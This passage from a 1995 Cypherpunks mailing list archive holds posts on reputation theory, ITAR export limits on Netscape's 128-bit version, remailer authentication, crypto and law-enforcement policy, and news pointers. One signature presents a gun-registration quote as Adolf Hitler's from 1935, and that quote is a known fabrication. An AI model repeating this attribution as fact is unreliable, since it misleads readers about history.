are intrinsically no less convenient than insecure ones. Quite the opposite,
from what I've seen: secure algorithms tend toward simplicity, because
it's easier to prove theorems with a simple algorithm than with a 
convoluted one. RC4 is a fine example of this, astonishingly uncomplicated.

It's as easy to drop IDEA into a compression/archiving utility as it is
to put in the dreaded "proprietary" algorithm. Easier. And if you don't want
to pay the licensing fees, use Blowfish or 3-DES. Why these companies don't
is a anybody's guess. Take the example of StuffIt on the Mac, which
started out with DES and moved to some internally produced algorithm for
reasons no one at Aladdin has been willing to explain to me, even when
I asked with relative bluntness. Evidently, it was worth some trouble to
them to _reduce_ their security, of all things. That is a sad, sad 
situation. 

(No particular flame on Aladdin, other than the obvious technical one. They're
a fine bunch of folks, from my experience.)


                                  -- Will







From weidai at eskimo.com  Wed Nov 22 00:41:31 1995
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 22 Nov 1995 16:41:31 +0800
Subject: towards a theory of reputation
In-Reply-To: <199511220523.VAA28300@blob.best.net>
Message-ID: <Pine.SUN.3.91.951121234629.2539B-100000@eskimo.com>


On Mon, 20 Nov 1995, James A. Donald wrote:

> Any attempt to discuss and analyze reputations using
> morally neutral language is bound to wind up as boring long
> winded meaningless complicated word salad.

I don't understand what you mean by this.  Can you give an example to how 
to discuss reputation (i.e., the concept of reputation, not a particular 
reputation) using morally non-neutral language?

William J. Halverson wrote:

> What is the differnece between 'reputation' and 'value'?

When we say the value of some object, we implicitely assume that the 
quality of the information we used to evaluate the object is good enough 
that we don't have to deal with uncertainty.  When we speak of reputation 
however, we explicitely assume that we have less than perfect information 
and that uncertainties must be dealt with.  We normally speak of value of 
objects and reputation of entities, because information about objects are 
usually easier to obtain than information about entities.

> Why quantify it?  If Bob's advertising/testimonials are successful,
> he may not even have a 'reputation' because only insiders know
> about him.

Quantification is an abstraction that sometimes allows one to think about 
a concept more clearly.  You decide whether this is the case for 
reputation.

I don't completely understand your second sentence.  Only people who know 
that Bob exists has a reputation of him, so if only insiders know he 
exists, his reputation consists of the insiders' reputations of him.

Wei Dai





From post at txcc.net  Wed Nov 22 16:47:10 1995
From: post at txcc.net (post at txcc.net)
Date: Wed, 22 Nov 95 16:47:10 PST
Subject: PROPOSAL: cypherpunks-news@toad.com? (was: rand-test)
Message-ID: <199511230245.SAA00660@txcc.net>


At 01:28 PM 11/22/95 -0500, you wrote:
>
>A.Back at exeter.ac.uk writes:
>> It is much more efficient of list bandwidth to post short pointers
>> only, of the style John Young <jya at pipeline.com> posts.
>
>I agree with you.  John's posts are not always strictly on topic but
>they are always just pointers, and he typically posts them in a single
>group a day. They are also always very high quality information. I
>find them to be perfectly fine. 
>
>The recent "Friend;" stuff just annoyed me, though.
>
>Perry
>
>
I agree with you.

Sid






From jsimmons at goblin.punk.net  Wed Nov 22 17:14:11 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Wed, 22 Nov 95 17:14:11 PST
Subject: Spam the Sign!
Message-ID: <199511230113.RAA01841@goblin.punk.net>


> > 
> >         I do what RSADSI does with ftp.rsa.com. It requires a cronjob
> > and sed. I didn't get the NSA to approve it, but I figure if it's good
> > enough for RSADSI it's good enough for me.
> 
>   Do you have a legal opinion to support this statement?  Our lawyers
> tell us that executives of netscape could go to jail if we make the
> 128bit version of netscape available from an "export controlled"
> ftp or http server.  We are working to clarify the situation with
> the government or figure out an alternative distribution scheme that
> will remove us from the grey area.
> 
>   Getting the US version of netscape widely available is one of my
> highest priorities, but I can't tell Barksdale that he should go to
> jail over it.  I'm constantly pushing from within the company to keep
> things moving forward.

Actually ;-) Barksdale going to jail would probably advance the cause of
strong cryptography more than anything I can think of.  Can you imagine
the media circus when he's led out the door in handcuffs?  A man worth
somewhere around a billion dollars being arrested for trying to give away
his product?  Court reporters trying to explain ITAR to the public?  The
mind boggles.

... and he looked over at me and said, "What are ya in for?" and I said,
"Giving away free software," and they all moved away from me on the bench ...

You guys didn't get to where you are now waiting around for HTML v3.0 to
be approved.  There must be some way to challenge an attempt to use ITAR
to stop the DOMESTIC spread of strong crypto that doesn't involve the
incarceration of your top executives ...

-- 
Jeff Simmons                           jsimmons at goblin.punk.net




From jcobb at ahcbsd1.ovnet.com  Wed Nov 22 01:39:47 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 22 Nov 1995 17:39:47 +0800
Subject: Junk E-Mail
Message-ID: <Pine.BSD.3.91.951122040949.28519F-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
People are complaining about junk mail.  No problem... 
 
11 21 95 The Electronic Telegraph reports: 
 
   THE European Parliament will decide today whether to 
   ban junk mail. 
 
   Euro MPs are also considering whether to outlaw credit 
   card transactions by phone and whether direct selling 
   via E-mail should be curbed. 
 
   Today's vote has been triggered by proposals from the 
   European Commission to protect consumers buying 
   goods without seeing them. 
 
 
Your complaints are highly valued at Minute Mortuary at 
2d & Main, which advertises "Privacy Knows No Limits." 
 
 
Cordially, 
 
Jim 
 
 
 
 
NOTE.  The Electronic Telegraph website's URL: 
 
       http://www.telegraph.co.uk 
 
       The newsstory's headline: 
 
       Junk mail faces last post 
 
       Its online filename: 
 
       wjunk21.html 






From jcobb at ahcbsd1.ovnet.com  Wed Nov 22 01:47:13 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 22 Nov 1995 17:47:13 +0800
Subject: rand-test
Message-ID: <Pine.BSD.3.91.951122041655.28519J-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
The following information from 
 
         CIAC Bulletin G-04:  X Authentication Vulnerability 
 
                     November 20, 1995 22:00 GMT 
 
may be of use to you: 
 
     If you cannot use DES, you can determine your expo- 
     sure to remote attackers by testing the strength of 
     your rand() function using the program rand-test; the 
     source is available as 
 
          ftp://ftp.x.org/pub/DOCS/rand-test/rand-test.c 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  To subscribe to CIAC Bulletin, email to 
 
                   ciac-listproc at llnl.gov 
 
       the one-line message 
 
 subscribe ciac-bulletin <your last name>, <your first name> 
                     <your phone number> 
 
       for example: 
 
 subscribe ciac-bulletin Adolphus, Gustavus 000-000-0000 x00 







From jcobb at ahcbsd1.ovnet.com  Wed Nov 22 01:52:42 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Wed, 22 Nov 1995 17:52:42 +0800
Subject: Junk E-Mail - Part 2
Message-ID: <Pine.BSD.3.91.951122041137.28519G-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
People are complaining about junk mail now.  Wait until 
they find out what real JUNK mail is... 
 
11 21 95 Associated Press reports: 
 
   To make electronic mail as universally available in the 
   United States as telephones, the federal government and 
   business would need to work together, the [RAND] report 
   said. 
 
 
RAND is known for generating options, but... 
 
   ...the study recommended using public funding.... 
 
 
The government --I mean, RAND-- isn't too happy about 
people owning their own computers: 
 
   As a way to reach people who don't own computers, the 
   study recommended that terminals be located in public 
   places -- street corners, community centers, libraries, 
   hotels -- just as pay phones are, so people can send and 
   receive electronic messages. 
 
 
What if people find out that this "private study," as AP calls 
it, is really JUNK mail from Joint Underhanded 'Net Kill-off? 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The NandO News website's URL: 
 
       http://www.nando.net 
 
       The newsstory's head- and datelines: 
 
       Study: Every American should have mailbox in 
       cyberspace 
 
       WASHINGTON (Nov 21, 1995 - 11:01 EST) 
 
       Its online filename: nation611_4.html 






From moroni at scranton.com  Wed Nov 22 02:09:39 1995
From: moroni at scranton.com (Moroni)
Date: Wed, 22 Nov 1995 18:09:39 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <v02130512acd7941208f9@[199.125.128.5]>
Message-ID: <Pine.LNX.3.91.951121134201.2872A-100000@prufrocks.scranton.com>


    There is and probably never will be a shortage of people to carry on 
wire tapping . The term agent could be all encompassing in the future to 
include but not be limited to the hiring of ex-federally employed 
personnel with the talents or capacity for the talent to do wiretapping. 
In other words there are any number of ex-CIA ,DEA, ex-military who if 
were hired would actually save the government investigation time and 
costs because they have allready gone through security clearance. Add to 
that the fact that most if not all FBI personnel have gone through a 
light wiretap course to famililarize them with the rudiments of the craft.
   All these figures add up to cover the taps in case a disaster of the 
terroristic kind should happen. I feel that numbers are there to worry 
people but that what the FBI is worrying about is whether it can cover 
large ground if there is a siege like state in this country.HOWEVER, 
there will allways be those that opportunistically take advantage of 
circumstances to set up their own invisible little feifdoms along the 
political and social terrain. 
   If you ask me if there is something for them to worry about I have to 
in all good conscience say yes , if you ask if there is something for us 
to worry about again I have to say yes. I don't know if there is even a 
common ground for both sides to work towards because terrorism has grown 
to include the homegrown variety .
 
                     Deirdre





From anonymous-remailer at shell.portal.com  Wed Nov 22 02:45:56 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 22 Nov 1995 18:45:56 +0800
Subject: Mandarins, Lifers, and Talents
Message-ID: <199511221028.CAA25326@jobe.shell.portal.com>


On Tue, 21 Nov 1995, Lou Poppler wrote:

> Mandarins were involved in the genesis, certainly, both of our little 
> college network, and of the military's arpanet.  The mandarins provided
> our subsidies, and some of them found ways to use the net in doing their
> academic work.  Very many of them ignored us.  

Or tried their uptmost best to ... until we came a knocking.

> Among us paid computer staff,
> the mandarins held occasional blue-sky meetings to plot the future and
> standards for the future; the lifers went about their business of feeding
> hollerith cards to the mainframes; and the talents immediately set about
> exploring this orthogonal new quirk of their machine.  All the edges were
> rough in the beginning, and for a long time after the beginning.  

Gee, I thought, err ... uhhm, shoot, aren't we still at the beginning??

Not the very beginning, but the beginning.

Wasn't all of the NII stuff simply a true mandarin plot^H^H^H^H
scheme^H^H^H^H^H^H contingency to get enough money to continue
"The Project" during some very lean budgetary years? 

Or am I behind in my reading again ...

> Network
> code arrived in huge inspired chunks from our eccentric talents.  Other
> talents, staff and user alike, would go out to play on the network and
> find little suggestions for the eccentric talents responsible.

All talents are by definition _irresponsible_.  They have to be in order
to take the risks, sometimes some very silly risks in hindsight. 

> I think the early networks were less than satisfying for the mandarins.

A satisfied mandarin??  Hmmm.  That'll take a couple of cycles to 
compute. ;-)

> It required arcane mandarin accounting schemes to rationalize our
> perpetual defecits, even in a 'funny money' accounting world.

Well, they've saved my butt (I think) when someone hung up the phone on
me. 

And for this, they've certainly got *some* of my allegiance.  ;-)

And they have my gratitude.

> Policies and standards were strained by the sudden accessibility of 
> the foreign operations, under alien chains of command.  The networks
> were immediately untidy and required compromise from the user.
> 
> The biggest contribution from the mandarins, and I mean this with 
> all gratitude, is that they chose, again and again, not to shut us down.

Chin. chin.

> ObCrypto: we were still getting the bugs out of rot13 back then.

Ahh, before they broke the code on what a baker's dozen REALLY was all
about.  Way back in the days when one-half was still working on rot12.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cman at communities.com  Wed Nov 22 19:08:07 1995
From: cman at communities.com (Douglas Barnes)
Date: Wed, 22 Nov 95 19:08:07 PST
Subject: ecash protocol: Part 1
Message-ID: <v02120d05acd986f50e5e@[199.2.22.120]>



> From what I gathered from Doug's posts a little while back, the _client_
>stuff is perfectly fine; only the _bank_ stuff is Chaum-patented.
>

This is exactly backwards. Also, it is entirely possible that they
have structured the protocol to make sure that both sides have to
practice some element of Digicash intellectual property. What I
said was "it is possible to create an anonymous digital cash system
where the bank does not infringe and the client can optionally
infringe or not infringe (sacrificing anonymity)."

(See: http://www.communities.com/paper/agnostic.html)







From anonymous-remailer at shell.portal.com  Wed Nov 22 03:09:39 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Wed, 22 Nov 1995 19:09:39 +0800
Subject: Java & Netscape security [NOISE]
Message-ID: <199511221048.CAA26409@jobe.shell.portal.com>


On Tue, 21 Nov 1995, Dr. Dimitri Vulis wrote:

> Hmm... If it looks remotely like marketing, it'd better carry the usual
> disclaimers that past returns are no indication of future returns etc. :)
> 
> >In the first case, the poster is not commenting about anything to do with
> >their work, -- it really is just one man's opinion -- while in the second
> >they are actually commenting upon something their employer is selling.

What I'm trying to say is that if someome posts from watson.ibm.com,
and IF they are talking about OS/2, we will not accept that they are
not speaking independantly of the knowledge they have garnered from
watson.

It just doesn't work that way.

In the same way, someone who writes from Netscape.com or AT&T, or Sun
and tries to disclaim that they are speaking for the company, when
they step out as an employee of a company is deluding themselves.

When in the press have you seen a reporter claim as a source, an
"unnamed Senator"?



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

P.P.S.  I just sent email to Steve Bellovin from AT&T.  I thought I'd 
        settle the question once and for all, as to whether he IS 
        reading this mailing list or not.







From khijol!erc  Wed Nov 22 19:49:05 1995
From: khijol!erc (Ed Carp [khijol SysAdmin])
Date: Wed, 22 Nov 95 19:49:05 PST
Subject: Visual Basic 4.0 encryption prog.
In-Reply-To: <Pine.SUN.3.91.951122153315.26251W@amanda.dorsai.org>
Message-ID: <199511230443.WAA07909@khijol>


-----BEGIN PGP SIGNED MESSAGE-----

> But there is no reason why this isn't possible in ANY language.  You'll 
> just have to write a lot of code by hand, or port to VB... especially the 
> large-number routines.

I don't see any reason why crypto routines written in C can't be 
converted to .DLL files - then you can call them from VB or whatever.  No 
need to convert them to VB.
- --
Ed Carp, N7EKG    			Ed.Carp at linux.org, ecarp at netcom.com
					214/993-3935	voicemail/pager
Finger ecarp at netcom.com for PGP 2.5 public key		an88744 at anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLP75yS9AwzY9LDxAQFNOAP+JizKSm76+ktgzM7mbF05l5KwwfIDVL2u
kPsL9aIEmQLNl9IfF6Q/ROPTL8U9QJRdzUhyOPTlCV2TFZfA48e4W68Nqa6AX+up
lMedQuxIjqclK8vJzj1uKOP0/HhbOyn1RLLwthNGWXXt+WM882Vq6NES/eB+kwGN
o3/fDEMIg2g=
=PhJu
-----END PGP SIGNATURE-----




From weidai at eskimo.com  Wed Nov 22 04:41:12 1995
From: weidai at eskimo.com (Wei Dai)
Date: Wed, 22 Nov 1995 20:41:12 +0800
Subject: towards a theory of reputation
In-Reply-To: <199511212332.PAA24563@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951121223454.2539A-100000@eskimo.com>


On Tue, 21 Nov 1995, Hal wrote:

> This is an interesting approach.  However this seems to fold in issues of
> reliability with issues of quality and value.  If I have a choice of two
> vendors, one of whom produces a product which is twice as good, but there
> is a 50% chance that he will abscond with my money, I am not sure how to
> value him compared with the other.  It seems like the thrust of the
> analysis later is to determine whether people will in fact try to
> disappear.  But that is not well captured IMO by an analysis which just
> ranks people in terms of "utility" for the price.

Our intuitive notion of reputation combines the issues of reliability and
quality.  In your example, whether you choose the reliable vendor or the
unreliable one depends on whether you are risk-seeking or risk-averse. 
You must prefer one or the other or be indifferent.  In general how you
make these choices depend on your values and your expectations of what the
vendors will do, which include both expectations of reliability and 
expectations of quality.

Can you elaborate more on why the analysis is inadequate?  (I know it 
probably isn't adequate, but why do you think so?)

> I am not sure about this last point.  It seems to me that a good
> reputation is one which is most cost-effective for its owner.  Whether it
> is good for social stability is not relevant to the person who is
> deciding whether to use it.  ("But what if everyone behaved that way?
> How would you feel then?")  It may be nice for the analyst but not for
> the participant.

Right, I'm speaking from the point of view of the analyst when I say
"good", but it also applies to individual participants.  Each person does
what he thinks is in his best interest, but if this turns out to be
unstable for the reputation system as a whole, then it won't last very
long so there is little point in getting involved in the first place.  In
other word, I would not choose to participate in an unstable reputation
system. 

> I don't really know what the first one means.  There are a lot of
> different ways I can behave, which will have impact on my reputation, but
> also on my productivity, income, etc.  There are other ways I can damage
> my reputation than by cheating, too.  I can be sloppy or careless or just
> not work very hard.  So the first two are really part of a continuum of
> various strategies I may apply in life.  The second is pretty clear but
> the first seems to cover too wide a range to give it a value.

You are right that there is continuum of strategies, but I assume there is
a discontinuity between completely throwing away your reputation and any
other strategy.  So operating value is the maximum amount of profit you
can make by optimizing among all other strategies except disappearing. 

> It would be useful to make some of the assumptions a bit clearer here.
> Is this a system in which cheating is unpunishable other than by loss of
> reputation, our classic anonymous marketplace?  Even if so, there may be
> other considerations.  For example, cheating may have costs, such as
> timing the various frauds so that people don't find out and extricate
> themselves from vulnerable situations before they can get stung.  Also,
> as has been suggested here in the past, people may structure their
> interactions so that vulnerabilities to cheating are minimized, reducing
> the possible profits from that strategy.

When I wrote the original post I was thinking of the classic anonymous 
marketplace.  But I think it can apply to other types of markets.  
Cheating costs can be easily factored into the throw-away value, and 
an important question for any theory of reputation to answer is how 
to structure transactions to minimize this value.  Many more assumptions 
need to be made in modeling a particular reputation system, but I was 
trying to list some general properties that might apply to all reputation 
systems.

> It might be interesting to do something similar to Axelrod's Evolution
> of Cooperation, where (human-written) programs played the Prisoner's
> Dilemma against each other.  In that game, programs had reputations in
> a sense, in that each program when it interacted with another
> remembered all their previous interactions, and chose its behavior
> accordingly.  The PD is such a cut-throat game that it apparently
> didn't prove useful to try to create an elaborate reputation-updating
> model (at least in the first tournaments; I understand that in later
> versions some programs with slightly non-trivial complexity did well).

The tit-for-tat program that won both contests uses an extremely simple 
reputation algorithm -- it expects the next action of the other player 
to be the same as the last action.  This is an example of what I called a 
"good" reputation algorithm.  It serves the self-interest of the entities
that use it; it is cheap to use; when widely used the system is stable.

Wei Dai






From perry at alpha.jpunix.com  Wed Nov 22 04:51:03 1995
From: perry at alpha.jpunix.com (John Perry)
Date: Wed, 22 Nov 1995 20:51:03 +0800
Subject: Syrinx Remailer is no more
In-Reply-To: <acd8650b03021004a42c@[137.110.24.250]>
Message-ID: <199511221230.GAA16020@alpha.jpunix.com>


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Lance" == Lance Cottrell <loki at obscura.com> writes:


    Lance> -----BEGIN PGP SIGNED MESSAGE----- This is the kind of
    Lance> announcement which really needs to be authenticated.  I
    Lance> will leave syrinx on my list until I see a signed message
    Lance> confirming this announcement. If we do not bother to
    Lance> authenticate this kind of message, why bother with all the
    Lance> crypto, here is the mother of all denial of service
    Lance> attacks.


    Lance>         -Lance

    Lance> At 7:22 PM 11/21/95, Sam Kaplin wrote:
    >> Effective immediately syrinx at c2.org is no more. I no longer
    >> have the time to keep this remailer up and running. Perhaps
    >> somewhere down the line I will set up another one. Please
    >> remove Syrinx from your chains.

I agree with Lance. It stays in the list I distribute until I see some
authentication from Sam Kaplin.

 John Perry - KG5RG - perry at alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 Packet Radio - KG5RG at WA4IMZ.#SETX.TX.USA.NA
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry at jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLMX1FOTpEThrthvAQGGAQP/QwsbBb9QlCt1Oth7V3Du/E1a+dXf/OUA
hVh2VSFmwiS0vuspsOtrSHAMYC2pH7py+IIHwi+28HyaFf3tpmhZsseuDklPPo/t
8j0v8Pb4pKIumTkAJ7YhEl5HNA7atpM+7eWPe8VmE7UfPTNKmaNBlqkEuXAB9T00
LhgR4Xh5QCE=
=fDBZ
-----END PGP SIGNATURE-----





From kelli at zeus.towson.edu  Wed Nov 22 20:52:53 1995
From: kelli at zeus.towson.edu (banjo, lord of the sea monkeys)
Date: Wed, 22 Nov 95 20:52:53 PST
Subject: Nicholas Negroponte interview in MEME
Message-ID: <Pine.ULT.3.91.951122234358.4115A-100000@zeus.towson.edu>



The latest issue of MEME has a pretty good interview with Nicholas 
Negroponte of the MIT Media Lab.  Some privacy issues are discussed, the 
idea of intellectual property is touched on, as well as some other good 
stuff.

I'm not sure if it's on the web, but I'll forward the interview to anyone 
who would like to have it.

K. Ellis


OBCrypto:  How's it going, Perry?  

<grin>
Kathleen M. Ellis     http://zeus.towson.edu/~kelli/     kelli at zeus.towson.edu
Diverse Sexual Orientation Collec. Towson State University DSOC at zeus.towson.edu
"Your friends are really just enemies who don't have the guts to kill you"
       							-J. Tenuta







From cme at clark.net  Wed Nov 22 22:34:06 1995
From: cme at clark.net (Carl Ellison)
Date: Wed, 22 Nov 95 22:34:06 PST
Subject: crypto for porno users
Message-ID: <199511230633.BAA05538@clark.net>


I hear occasional uproar from LE types about porno traffickers using strong
crypto like PGP.

[I've been known occasionally to say things for their shock value, but this
time I'm quite serious.]

		------------------------------

As a society wanting to limit the spread of porn, we should encourage those
trafficking in porn to use strong crypto.

1. If two people are sending porn from one to another over the net, the net
	is so insecure that many people along the way could see it.  The
	recipient field could be mistyped, as well.  Either way, someone
	who doesn't want the porn could receive it and be offended.  Strong
	crypto wrapping that porn protects the innocent accidental
	recipient from exposure to the porn.

2. If cops want to track down some pornographer (e.g., because he's dealing
	in child porn), the net and strong crypto provide two opportunities
	to the police:

	a) "no one on the net knows you're a dog" implies that police can
	pose as a fellow porn producer or consumer and get away with it
	more easily.

	b) strong crypto for communications between porn users encourages
	them to speak more freely.  When one of the two is a police officer
	in disguise, that encourages the other (the suspect) to reveal more,
	making the investigation proceed more quickly.  Knowing that the
	crypto is strong enough to keep government eavesdroppers out, the
	sender is given a false sense of security -- is distracted from
	thinking about the trustworthiness of the receiver while thinking
	about the security of the channel itself.

3. Encryption of porn would work against the kind of porn distribution
	found on the alt.binary.pictures.erotic... newsgroups.  Encryption
	requires that recipients be identified.

4. Personal file encryption encourages individuals dealing with porn to
	encrypt and keep personal diaries which might contain evidence.
	Since PGP is subject to brute force passphrase attacks, this gives
	an attack which will open *some* of these diaries.  Without the
	encryption, the suspect is less likely to keep the diary in the
	first place.  This isn't a guaranteed opening into all such
	diaries.  There is no such guarantee possible.  Rather, this
	suggests that strong crypto has a chance to maximize the effective
	"take" by LE forces.


These advantages are balanced against the possibility that there is some
group of pornographers who communciate together, who are identified by the
police, who would be wiretapped *and* who are not infiltrated -- and
therefore whose conversations are unavailable to the police.  The larger
such a group, the less likely it will remain non-infiltrated, so these
groups are probably very small.  There might be some of these -- just as
there might be a few pornographers who have diaries that are encrypted and
unbreakable.  However, strong crypto opens a number of opportunities for
successful investigation -- and it's my guess that in the balance, strong
crypto adds up as a net advantage to the police rather than a net drawback.

 - Carl

 +--------------------------------------------------------------------------+
 |Carl M. Ellison    cme at acm.org    http://www.clark.net/pub/cme            |
 |PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
 |  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
 +---------------------------------------------- Jean Ellison (aka Mother) -+





From adam at lighthouse.homeport.org  Wed Nov 22 07:18:58 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Wed, 22 Nov 1995 23:18:58 +0800
Subject: Java & Netscape security [NOISE]
In-Reply-To: <i6uyeD4w165w@bwalk.dm.com>
Message-ID: <199511221435.JAA06382@homeport.org>


Dr. Dimitri Vulis wrote:

| Moreover, I think that if someone known to work for Sun 
| posts from Netcom about Sun products, policies, and future plans,
| s/he'll have both higher credibility and higher responsibility to
| the readers than a proverbial person from the street.

	Could I suggest that people who are in this situation create a
nym-key, work through remailers, and we drop the thread?  :)

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From liberty at gate.net  Wed Nov 22 07:24:41 1995
From: liberty at gate.net (Jim Ray)
Date: Wed, 22 Nov 1995 23:24:41 +0800
Subject: Encryption Politics (was Re: "Dear Newt" Letter...)
Message-ID: <199511221444.JAA137201@tequesta.gate.net>


-----BEGIN PGP SIGNED MESSAGE-----

Phill <hallam at w3.org> wrote:

<snip + slight reformat>

>If you make it a party issue you will not only lose but risk turning the 
>clock the other way. At the moment everyone knows that the export control 
>laws are not stopping people from getting PGP. It is not a good idea to
>rub peoples noses in it.

Why not? It gets the issue talked about when it otherwise wouldn't be.
The cypherpunks are the Dr. Kevorkians of stupid US export laws.

>It is easy to ignore export violations by turning a blind eye. It is 
>difficult to turn a blind eye when people are so anxious to announce what
>is going on.

Exactly. I plan to go to the Nandotimes article at URL
http://www2.nando.net/newsroom/ntn/info/info429_4.html
and see what it looks like with a few substitutions like
"cars," "highways," and "doorlocks" for words like "encode"
or "encrypt." Sarcasm is often the last refuge libertarians
have in these humor-impaired times, but it keeps me sane. :)

>Phil Z. is not having problems because he wrote PGP, he
>is having problems because he made sure the FBI couldn't pretend they
>did not know what was going on.

Well, not exactly. I believe from what I've seen here before that
it was Kelly Goen(sp?) who did this. Of course, I've advocated
everyone taking legal responsibility for Kelly's actions as a kind
of protest against creeping Naziism in "our" government (see my
"An Old Idea" post, buried somewhere in the c-punk archives).

>If you make encryption a party issue then one of those Grassley bills
>will pass and the President in power may not veto it.

Encryption _IS_ a party issue, and quite possibly an effective one
if we used it correctly, for the *Libertarian* Party! The actions
of both "major" parties would have been [IMO] bad PR if the media
decided to do their jobs (I know, big "if"). There is, of course, 
institutional L. party resistance to putting the individual right
to strong encryption on the "front burner" because our "generals,"
despite a consistent record of losing battles, insist on fighting
the last war (that is, when we aren't busy fighting eachother).
<sigh>
JMR

 [Who takes this opportunity to remind SO FL cypherpunks of the
  party at 7:30PM on Wed. Nov. 29th.]


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh.

iQCVAwUBMLMw9m1lp8bpvW01AQEYggP/R/2nI8TurElr/c1haz6XNzWhUjVxZXtG
bQRs9FkHX54300G5tYW1BSe37eQ+5AT6LyjjljLdtx4nYKUSDRUHqYCs/qQkspOU
jFxfTAV8TOwMaopL4odBfgDeBVBhXRcjtsYu2rQ6WFF759TCTVYpxjhr7B8JDnR8
LoTFhEBAdTk=
=wBjX
-----END PGP SIGNATURE-----
Regards, Jim Ray --  http://www.shopmiami.com/prs/jimray

 "This year will go down in history, for the first time a civilized
  nation has full gun registration!  Our streets will be safer, our
  police more efficient, and the world will follow our lead in the
  future." -- Adolf Hitler, 1935

-----------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35 (key on page & servers) <liberty at gate.net> IANAL
-----------------------------------------------------------------------
Help Phil! email zldf at clark.net or http://www.netresponse.com/zldf
_______________________________________________________________________





From ac at hawk.twinds.com  Wed Nov 22 07:32:48 1995
From: ac at hawk.twinds.com (Arley Carter)
Date: Wed, 22 Nov 1995 23:32:48 +0800
Subject: Are there enough FBI agents to handle Digital Telephony?????
In-Reply-To: <Pine.LNX.3.91.951121134201.2872A-100000@prufrocks.scranton.com>
Message-ID: <Pine.HPP.3.91.951122092816.26394A-100000@hawk.twinds.com>


This discussion is beginning to resemble one about the telephone system
about 50 years ago.  A national phone system was considered an impossibilty
by many.  This is because even if AT&T  employed every female >18 years 
old as a telephone operators there weren't enough to plug and unplug all 
the connections on the all the switchboards. 

Regards:
-arc

Arley Carter
Tradewinds Technologies, Inc.
email: ac at hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation of government agency>."
 
 On Tue, 21 Nov 1995, Moroni wrote:

>     There is and probably never will be a shortage of people to carry on 
> wire tapping . The term agent could be all encompassing in the future to 
> include but not be limited to the hiring of ex-federally employed 
> personnel with the talents or capacity for the talent to do wiretapping. 
> In other words there are any number of ex-CIA ,DEA, ex-military who if 
> were hired would actually save the government investigation time and 
> costs because they have allready gone through security clearance. Add to 
> that the fact that most if not all FBI personnel have gone through a 
> light wiretap course to famililarize them with the rudiments of the craft.
>    All these figures add up to cover the taps in case a disaster of the 
> terroristic kind should happen. I feel that numbers are there to worry 
> people but that what the FBI is worrying about is whether it can cover 
> large ground if there is a siege like state in this country.HOWEVER, 
> there will allways be those that opportunistically take advantage of 
> circumstances to set up their own invisible little feifdoms along the 
> political and social terrain. 
>    If you ask me if there is something for them to worry about I have to 
> in all good conscience say yes , if you ask if there is something for us 
> to worry about again I have to say yes. I don't know if there is even a 
> common ground for both sides to work towards because terrorism has grown 
> to include the homegrown variety .
>  
>                      Deirdre
> 





From froomkin at law.miami.edu  Wed Nov 22 08:00:23 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 23 Nov 1995 00:00:23 +0800
Subject: Spam the Sign!
In-Reply-To: <199511220307.VAA01713@snoopy.vetmed.auburn.edu>
Message-ID: <Pine.SUN.3.91.951122100156.22711E-100000@viper.law.miami.edu>


[regarding suggestion that netscape give mit or someone a 128 bit version 
to place on an ftp server]

This is not an apology for the the ITAR, just my usual lawyerly overcaution:

Suppose A gives B a program that is export controlled, intending for B to 
allow it to be exported.  Has A conspired with B to export the program?

Let's ask the grand jury investigating Phil....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin at law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.






From froomkin at law.miami.edu  Wed Nov 22 08:04:07 1995
From: froomkin at law.miami.edu (Michael Froomkin)
Date: Thu, 23 Nov 1995 00:04:07 +0800
Subject: towards a theory of reputation
In-Reply-To: <Pine.SUN.3.91.951121234629.2539B-100000@eskimo.com>
Message-ID: <Pine.SUN.3.91.951122095930.22711D-100000@viper.law.miami.edu>


This discussion puzzles me.  I thought we were bombarded with 
reputational goods all the time:  brand names, stocks (what is a purchase 
in the 2ndary market but a purchase of reputation most of the time?), 
degrees from famous universities.  Anonymity compliates matters only if 
no systems of unique ID is used.  Throw in digital signatures and we are 
back at brand names, aren't we?

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
